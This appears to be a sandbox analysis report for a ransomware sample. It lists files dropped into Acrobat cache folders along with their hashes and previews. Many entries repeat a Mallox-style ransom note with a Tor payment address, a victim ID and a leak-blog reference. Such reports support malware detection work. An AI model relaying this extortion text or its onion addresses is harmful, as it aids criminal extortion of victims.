                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):270444
                        Entropy (8bit):7.953409346297481
                        Encrypted:false
                        SSDEEP:3072:lIVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVp:G
                        MD5:EEA548BD103F6790D0B51E1005374A12
                        SHA1:10E9AD747E106945D14E09867FA941B41016D96B
                        SHA-256:501F13919D716A7DC92A9C1AAC4F2DC6A5D084D386105F9EC47EF2DF28C49FDC
                        SHA-512:5A2AD69F41430413F1DBD16EF842B271C6B55875A6B760B0BA9A834D749AD70F2C59706CE258A747AC82907FC1E4A2C6225CBBDE3E4F3867D6C82622B953B06A
                        Malicious:false
                        Preview:..C.,.|..>fUE.B.p.....).r.QrmJ6..iP}....o.e.....D@1..I.IeM.q...l.....v=@p..J.D..S%.p[....+.1.S.p..x..n....^~..AaP..:?...u.B/M.@U..~.Oj...%/....'....C.)h.-v.X...K../....&o...C3Z.}..8R;..#.....\(D..AW.#N..0I.a.3......9U..y.}.....F....3.._......%.$._`'9...sL....M....E.N...P...g.w.../.....s+...P.q.mD...8'c....!..y}...y..'.\...c.R1$.B..g.x.g.0G.....s;o.C:'J..%.f...#<P.....fI.~.L...........tnOz8..~.....2.........a...d.1.-@@..'..MS.....Y....t..7Hz..e.<b2.3..<.U..[8..w{.;.t. ....Fp.......v....CEAn...{ .<y.?{Y._\.@.../.p....g......R..q^....=.H..R...fj.......b......^.,[...7.).!.+R.../9:.G..e........S..Z...~...5"..l.0.p*.$.E]..Bo.m.8...B.T|!_..s..5{...l1..`.....Q....B.......UrO%w..@.T..8[@.F..f]....G..~,..%X._V....%c[.i.n.Ow]\.d..j..s.5..&zG.B.k.'..5.TA...Jq..~..+u#.....ko.M.v.PN..*.i..T..^.:.t.dT...y..J....Q..:....W....!=.0...>.,..K.k..Y.~....z..F..v..t.9|{..t...Yt...9.........3...jg......cY....*.1.%k..z.r../.n>..m\aJ...W..LMVH..Bp....5.,..;}e<.

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):262620
                        Entropy (8bit):7.952459000530222
                        Encrypted:false
                        SSDEEP:1536:EoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTxIJoTM:a
                        MD5:FC3F873C379C246F8DD6C3D878314480
                        SHA1:5CCA97A28E339BDCD82B6327B4087E9037761CC6
                        SHA-256:6FA524FB728643D9C1122FCBDC02F5A572CDBB1A0B5729704214DC76E21ABB4C
                        SHA-512:0DF3E67DAABEE5CEEED17B8C06556DFFF1A857BAB262E8E202D2B10D42EB7C0EBD782D3B5FD2D9060BE293820013AA49CCC93FAF18B5670AB6A113294459E235
                        Malicious:false
                        Preview:<....>..!...G.{..E. .w.l.5|...5..a...K....u.#l.I.V.u...T@....k...|.... .I%...>"%.\n.w.n.W+.....4G...\..C......X.........6e,..5gq.........=~..,.@w.i7.3F9.B5.N.'..<..R..YhT/.X....:.c...Tg..]m....cN..Y...H.. ..g:r..V.)...f..6.......Sg.9..z.|..#Hi.._..X.rv.8..|...rN*.\M19d....Rr.G../A..:.c/.=..(./.........4N6=^...........l.8..g..i.l..8.N.sc...`..G^-.O=M...G.G/....{?.p.W..l...eZEP.......Rr.......Y...$..J(..Z.fOb...%..*."..8.i...+0}..... ..W....Y.m..O..[....6]...H.n......J7B..4.Vp.)..,.....PP..h...m...`K..S.b...&......1..u.4....0.a.u.T.X...A%).(...C..2.i...../.Fo.H0..M.;.^..Z...9.y..6U!....{.....2...7.c...,..[......O....I.'|y.hY>K....>.s.w..n}....].ys.w...m92K.6.(.:3'L.)..>.#.g.c.....plG..fH.!i.Rr%S.........|....h.2...L.U...+...`..n.5.X........[1...Z.kz$b....h..... #Z{Kk}.._.I.bG^LY.i%.p$.,o.E..P.].B.<..J(*{....jo.Zq...2r.&.....F.>'.;.....G.o.pv3l.....C54t..'...{.{.KRH..p.......~7...2u$..._.G.T....D#a%3...I..X.{*..A......o>..>.+...........#N..

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20588
                        Entropy (8bit):7.991885151769378
                        Encrypted:true
                        SSDEEP:384:B2B0FOIHkcuR+smNS8XL8ikIAFYIkoh8ncp9LG/6hke+MxH5DrSaSn:B60EIEcw+RNSODIkxw9LG/6hkkjqaSn
                        MD5:07505952C723E071E549EE65711FD48F
                        SHA1:4E6D8874CA4800D4652824FE445F5C55DBD36CDD
                        SHA-256:1DC715823FF73A78A771BDEB8B0EB01390BD2091281B42B1FECE2EA7B5D622D7
                        SHA-512:76E8E1FAC25CAD9976ECE6DE69A4D4CEEAAFD0371A1FB382A3B9D9F8B8BEEBB00BBE8AC0CA0C9F0EE871841CDCA5259975D867FB16B0DAAAD085DA24A43AAF80
                        Malicious:false
                        Preview:..X.}..6.`......o.I:..W .i?H......Rh.$....-.r<f....rm!tnr+z....`..z.O..4..'j..=R.......k.JMy.`#.o5...........n....W...0....n...pJ.......@r...@4.....G.Mf.\.....o...(......z...<....d..^l.$@.#.......sT..%.....PN....K.kN/...9n._.._.ov.\e..]..y...\j..."..&.....).gu.(D_.....(..3.....c{..... ....E........u|.T>..........{.....|.....We...........^..b.....9..u1wb.;..-.!.......mu...{. ..Y...... ...*.Am ..$..C.~.....ZH......^.L;.E.w.7d..5.dq..&..Dhu.U..-[7w..fo.K._}......+.y....U.X3Q.....1....?.q.F.-....%(..*.."..[N.......~.....,{.....>CH.d.W..G.'z....%...I...+.xV.....p..+.hdz`Q....H..ID.1..1;)" .*...}..9.UD|..'.h.....oyX=.D..D.....v.0tj.K......u.`.1.UZ.....~..af2.@........+..*J.(vR.1vL.......c...k'...V...o\...r..._\.0.......l..rT.D.D.O.Sj...ya;cCt......s.....:h'(.j....J...l.h....... ..P..}'..(o.3....?v...!..i...8~TPq...E<+.X..2.p.1u.HHO.K........8.._.$.l.hO..0............ .G.*..Z.O.5S^...7U....:.....t.r...9)D....o...3.X...}.`e..{...3.Y&{^.6_

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):36972
                        Entropy (8bit):7.994750395280666
                        Encrypted:true
                        SSDEEP:768:ZAce8nc00tBKjA2dNTlXX29OCwpPDEzq0tcvMF+STm3t:u4cPmjhDpoLc7kBtckF+3t
                        MD5:4DB7DC6805B66493DF94283860C81ECE
                        SHA1:18B4742590496039B51D0D9FEE474C65A33F4ABE
                        SHA-256:AA028301A1E0CB7378F7665F2881567839DBC99EB784A0FC22C1D9E301760DB2
                        SHA-512:1552B461BA7567251B3329352FC6F482DADC9D25BE7C4C83EEDB7BD71C06092918321E10178EE721C927838F6C1D22F6A42E3F9095ED0FEF4905E4DC81BA89B9
                        Malicious:false
                        Preview:.........h2...q[...M@.%....'.b...4B.)..).q.....l..v..4.p...;K.*IB.....7 .;4.;...g...Ye....A4....#.z,RjU.E{a].~M.K...].._.^.y..^.Z..T...e.....>..a.n..2..yh........s....{...q6.x+b.=...l.p.5.>#...&..U.cHT....Su.]...(#.....*4{hZqq..!R.lM..=..../\%.]o......*.|...3.Z....ux<.:..T.T...^..|z.....{..[.....=T....XD...%^^.....M.c[I..e&...N/.g.......[....6.P.......K.H...W...3o.[.UK.g-.s...k...BW...Y..>.{52.NO........6.H87.~Q=.'...&...bD,.7......L.Z...m.."7DI...4-w.b.-<.~.Z_.B..,...r...v^/..^8.....& |...."~$.. .d.Vt...^...4......Ut.LN._RQ.D..H.D._.>S...u..do...J.M.D]).=.#.-..z....:H4...P....E.o..p.0....tv..50z...tW_.MT5.............?20`..zku3...HL.a..1.K m...$...*m..X.e.6..i"..NY..I.+..v..4i"V.$.tP6.;. .Q.:.!.h).00..H!.`{'..7$@....W`s.....z....Xcq..Pd.9\....n........dJP.G.o..M.Ljb.z*9J..B..w.d`B.ty...W.;..P....C.$j.u...5.x.uv....'%W...8.L?.......5.x...t..z.L|x[...G.?..:z.U.7..g~..Z4..+.-.....[..S..JE.x,.........7y...:.E..Nuo^.^Q8.a/C.

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):131180
                        Entropy (8bit):7.954645816149795
                        Encrypted:false
                        SSDEEP:3072:jBBBBBBBB6BBBBBBBBBBBBBBBBBBBBBBR:jBBBBBBBB6BBBBBBBBBBBBBBBBBBBBB7
                        MD5:D17BD5E67F5E190992E075849763AB18
                        SHA1:2CBB8F73D0ED4A8608F7680907A5D93F9CF16C5E
                        SHA-256:B49437FB4BDC2D5D3672E699A8E6A4CBC2C1BCB72486B7A9929120858299D27E
                        SHA-512:879933020316DE6ECC67A68D02A5FC576239D3DCB9E5D7F73FAC07E113160B5E2E612348D7EDB9A29C608BE843A782C33DA9151A14F75AF652AD50A4A7561A7F
                        Malicious:false
                        Preview:.............m....[{..qN$..V.t......V.....7{.~...w......Q..n..X.P0...W..6.J..|....@.<.1.....x;W8..4`....}..>.Sx.43.n.BWT...U...........*........w.....h....A.k...........ys...{....<...G..Z#....u&.W..4.....Z..+..r.....R!-.9s......1.....8...oj.7\. vB...:.AG.....n..l....)K..b...u... ...E./:.M.mA.T"A...n..W.[.Z...d;.^|..........}{.{.E.F..n.....~SZ..M.=........{O....2..O......FMz.co.GM^....f*.}m(....X.[.Qy...5.ST=..&....K..Z......Dp.)<}9.g.v".o.1.L.......+........S..]..+.s..._z<k.&/?=.}..&..zg.D.=x.......>...l..(..}$TQ......Z..>.V....r."..?.6.t..........F..h.h ....{:...m..6.y.x.*z..SS....P.DM.....h..>...b....C...4..LQA....t...V.p.D?..W....I.siz.....=.l.4Qd. .6....d...#...F...VD.X..e...A;......4^...w-._.`s..].....l..b.....]..pL....bT..g..V....s}...8..t....=...s.....IG.....16...Y...j.?......?Y[N.C.Eh.#'J.i.Z{...b{.X1.8"b. mu.K.u]7Z.05..ZK..........Y..6D1.z...........Eh.?!7p& .'..y#{A'...h..{..`7b.a..:,Z.....w.)....Y."..........b.O..^U..

